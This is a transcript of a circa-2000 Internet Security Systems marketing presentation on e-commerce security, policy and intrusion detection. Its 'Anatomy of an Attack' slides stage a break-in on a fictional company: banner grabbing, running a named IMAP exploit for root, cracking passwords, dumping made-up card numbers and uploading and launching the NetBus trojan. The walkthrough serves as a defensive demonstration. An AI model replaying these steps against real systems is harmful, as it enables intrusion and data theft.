1 / 61

Protecting The Digital Economy

Protecting The Digital Economy. David Gerulski Director of Marketing Internet Security Systems. Agenda. Introduction E-Commerce Security Drivers Developing a Security Policy Anatomy of an Attack Policy Enforcement Enterprise Risk Management Security Resources Conclusion. ISS Overview.

jara
Télécharger la présentation

Protecting The Digital Economy

An Image/Link below is provided (as is) to download presentation Download Policy: Content on the Website is provided to you AS IS for your information and personal use and may not be sold / licensed / shared on other websites without getting consent from its author. Content is provided to you AS IS for your information and personal use only. Download presentation by click this link. While downloading, if for some reason you are not able to download a presentation, the publisher may have deleted the file from their server. During download, if you can't get a presentation, the file might be deleted by the publisher.

E N D

Presentation Transcript

  1. Protecting The Digital Economy David GerulskiDirector of MarketingInternet Security Systems

  2. Agenda • Introduction • E-Commerce Security Drivers • Developing a Security Policy • Anatomy of an Attack • Policy Enforcement • Enterprise Risk Management • Security Resources • Conclusion

  3. ISS Overview • Headquartered in Atlanta, GA, USA • Pioneered vulnerability assessment and intrusion detection technology • Leader in Enterprise Security Management • Publicly traded on NASDAQ: ISSX • Industry leading technology 35+ product awards • 1,000+ employee owners worldwide • Over 300 certified security partners • Over 7,500 customers worldwide

  4. ISS Market Share Network Intrusion Detection & Assessment Market Network Intrusion Detection Market Network Vulnerability Assessment Market Source: International Data Corporation (IDC), August 1999

  5. E-Commerce Security Drivers

  6. Business Is Changing Yesterday Today External Focus Internal Focus Suppliers, customers, and prospects all need some form of access Access is granted to employees only Distributed Assets Centralized Assets Applications and data are distributed across servers, locations, and business units Applications and data are centralized in fortified IT bunkers Generate Revenue Prevent Losses The goal of security is to protect against confidentiality breaches The goal of security is to enable eCommerce IT Control Business Control Security manager decides who gets access Business units want the authority to grant access Source: Forrester Research, Inc.

  7. 60% 40% 20% 54% 47% 38% 1996 1997 1998 The Threat Grows Source: 1998 Computer Security Institute/FBI Computer Crime and Security Survey

  8. The Internal Threat Is Real

  9. E-Commerce Issues Principle Business Drivers • Increase Revenue • Increase Profitability Principle Security Drivers • Greater Susceptibility to Attack • Greater Probability of Catastrophic Consequences • Much Greater “Loss to Incident” Ratio

  10. Our Strength Is Our Weakness • In Touch With Anyone With a Modem • Have an International Presence • Partners Can Now Collaborate • Leverage Web-based Supply Chain Technologies • Employees Can Work From Home, at Night, Over the Weekends, and on Holiday • Application Servers Can Support Entire Divisions

  11. Consequences • Exposure to Legal Liability

  12. DDoS Distributed Denial-of-Service Company A UNIX Firewall Web Server NT UNIX UNIX NT Company B Router University A Company C Company D

  13. Consequences • Exposure to legal liability • Decreased Stockholder Equity • 30 Seconds on CNN • Damaged Image

  14. Consequences • Exposure to Legal Liability • Decreased Stockholder Equity • 30 Seconds on CNN • Damaged Image • Decreased Employee Productivity • Loss of Intellectual Property & Assets • Inefficient Use of Resources

  15. Summary • E-Business is here to stay • Networks are exposed and under attack • There’s no more turning a “blind eye” • It’s a business issue and it should be treated in a business-like manner • Implement a security program not a security technology

  16. Developing a Security PolicyA Blueprint for Success

  17. Security Policy • Blue Print for Good Security Program • Standards Based - British Standard 7799 • Management Buy In • High Level to Technical • Business Driven Not Vendor Driven • Non-Static

  18. Enforced Security Policy • Minimize Exposure to Vulnerabilities • Prepare for Attacks on Our Systems • Manage Internal Staff Behavior • Manage External Access and Activity • Maintain Appropriate Security Configurations& Response Strategies • Exploit Built-in Security Features • Measure and Record Patterns and Trends for Future Security Planning

  19. The Anatomy of an Attack

  20. bigwidget.com

  21. Registrant : Big Widget, Inc. (BIGWIDGET_DOM) 1111 Big Widget Drive Really Big, CA 90120 US Domain Name: BIGWIDGET.COM Administrative Contact, Technical Contact: Zone Contact, Billing Contact: Simms, Haywood (HS69) Dodge, Rodger (RD32) Haywood.Simms@BIGWIDGET.COM Rodger.Dodge@BIGWIDGET.COM 1111 Big Widget Drive, UMIL04-07 1111 Big Widget Drive, UMIL04-47 Really Big, CA 90210 Really Big, CA 90210 678-443-6001 678-443-6014 Record last updated on 24-June-2000 Record expires on 20-Mar-2010 Record created on 14-Mar-1998 Database last updated on 7-Jun-2000 15:54 Domain servers in listed order: EHECATL.BIGWIDGET.COM 208.21.0.7 NS1-AUTH.SPRINTLINK.NET 206.228.179.10 NS.COMMANDCORP.COM 130.205.70.10

  22. hacker: ~$ telnet bigwidget.com 25 Trying 10.0.0.28... Connected to bigwidget.com Escape character is '^]'. Connection closed by foreign host. telnet bigwidget.com 143 hacker:~$ Trying 10.0.0.28... Connected to bigwidget.com. * OK bigwidget IMAP4rev1 Service 9.0(157) at Wed, 14 Oct 1998 11:51:50 -0400 (EDT) (Report problems in this server to MRC@CAC.Washington.EDU) . logout * BYE bigwidget IMAP4rev1 server terminating connection . OK LOGOUT completed Connection closed by foreign host.

  23. imap

  24. imap

  25. hacker ~$ ./imap_exploit bigwidget.com IMAP Exploit for Linux. Author: Akylonius (aky@galeb.etf.bg.ac.yu) Modifications: p1 (p1@el8.org) Completed successfully. hacker ~$ telnet bigwidget.com Trying 10.0.0.28... Connected to bigwidget.com. Red Hat Linux release 4.2 (Biltmore) Kernel 2.0.35 on an i686 login: root bigwidget:~# whoami root bigwidget:~# cd /etc cat ./hosts bigwidget:~# 127.0.0.1 localhost localhost.localdomain 208.21.2.10 thevault accounting 208.21.2.11 fasttalk sales 208.21.2.12 geekspeak engineering 208.21.2.13 people human resources 208.21.2.14 thelinks marketing 208.21.2.15 thesource information systems bigwidget:~# rlogin thevault

  26. cd /data/creditcards thevault:~# cat visa.txt thevault:~# Allan B. Smith 6543-2223-1209-4002 12/99 Donna D. Smith 6543-4133-0632-4572 06/98 Jim Smith 6543-2344-1523-5522 01/01 Joseph L.Smith 6543-2356-1882-7532 04/02 Kay L. Smith 6543-2398-1972-4532 06/03 Mary Ann Smith 6543-8933-1332-4222 05/01 Robert F. Smith 6543-0133-5232-3332 05/99 crack /etc/passwd thevault:~# Cracking /etc/passwd... username: bobman password: nambob username: mary password: mary username: root password: ncc1701 thevault:~# ftp thesource Connected to thesource 220 thesource Microsoft FTP Service (Version 4.0). Name: administrator 331 Password required for administrator. ******* Password: 230 User administrator logged in. Remote system type is Windows_NT.

  27. ftp> cd \temp 250 CDW command successful. send netbus.exe ftp> ftp> local: netbus.exe remote: netbus.exe 200 PORT command successful. 150 Opening BINARY mode data connection for netbus.exe 226 Transfer complete. quit ftp> thevault:~$ telnet thesource Trying 208.21.2.160. .. Connected to thesource.bigwidget.com. Escape character is '^]'. Microsoft (R) Windows NT (TM) Version 4.00 (Build 1381) Welcome to MS Telnet Service Telnet Server Build 5.00.98217.1 login: administrator password: ******* *=============================================================== Welcome to Microsoft Telnet Server. *=============================================================== C:\> cd \temp netbus.exe C:\TEMP>

  28. David Smith President@bigwidget.com NetBus 1.6, by cf David Smith < dsmith@bigwidget.com > My Raise < URGENT > Dear Mr. Smith I would like to thank you for the huge raise that you have seen fit to give me. With my new salary of $350,000.00 a year I am sure I am the highest paid mail clerk in the company. This really makes me feel good because I deserve it. Your Son, Dave Connected to the.source.bigwidget.com Screendump

  29. Crack NetBus imap Anatomy of the Attack BigWidget’s Network Web Server NT UNIX UNIX NT UNIX Firewall Router Network E-Mail Server Clients & Workstations

  30. Real World Web Page Defacements

  31. New York Times

  32. Policy Enforcement Through Detection and Response

  33. What Is Vulnerable? IT Infrastructure Web Server Servers Firewall Router Network E-Mail Server Clients & Workstations

  34. What Is Vulnerable? Applications E-Commerce Web Server Peoplesoft SAP Firewall Router E-Mail Server Web Browsers

  35. What Is Vulnerable? Databases Microsoft SQL Server Sybase Oracle Firewall Router

  36. What Is Vulnerable? Operating Systems Solaris HP-UX Windows NT Firewall Router Network AIX Windows 95 & NT

  37. What Is Vulnerable? Networks Web Server Servers Firewall Router TCP/IP Netware E-Mail Server

  38. Enterprise Risk Management

  39. Enterprise Security Management

  40. corrective action report GetAdmin Vulnerability: Severity: IP Address: OS: Fix: High Risk 215.011.200.255 Windows NT 4.0 From the Start menu, choose Programs/Administrative Tools/User Manager. Under Policies/User Rights, check the users who have admin privileges on that host. Stronger action may be needed, such as reinstalling the operating system from CD. Consider this host compromised, as well as any passwords from any other users on this host. In addition, Apply the post-SP3 getadmin patch, or SP4 when available. Also refer to Microsoft Knowledge Base Article Q146965.txt. Vulnerability Assessment Service

  41. INTERNAL Managed Intrusion Detection Service EMAIL ALERT/ LOG SESSION TERMINATED SESSION LOGGED ATTACK DETECTED RECONFIGURE FIREWALL/ ROUTER ATTACK DETECTED RECORD SESSION

More Related